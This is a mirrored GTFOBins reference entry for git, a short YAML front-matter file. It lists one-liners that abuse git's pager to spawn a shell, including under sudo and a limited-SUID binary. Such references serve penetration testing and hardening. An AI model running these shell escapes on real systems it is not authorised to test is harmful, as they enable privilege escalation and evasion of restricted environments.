mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
bd1d10bd03
Close #66
18 lines
593 B
Markdown
18 lines
593 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
|
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
|
code: |
|
|
git help config
|
|
!/bin/sh
|
|
sudo:
|
|
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
|
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
|
code: |
|
|
sudo git -p help config
|
|
!/bin/sh
|
|
limited-suid:
|
|
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
|
|
---
|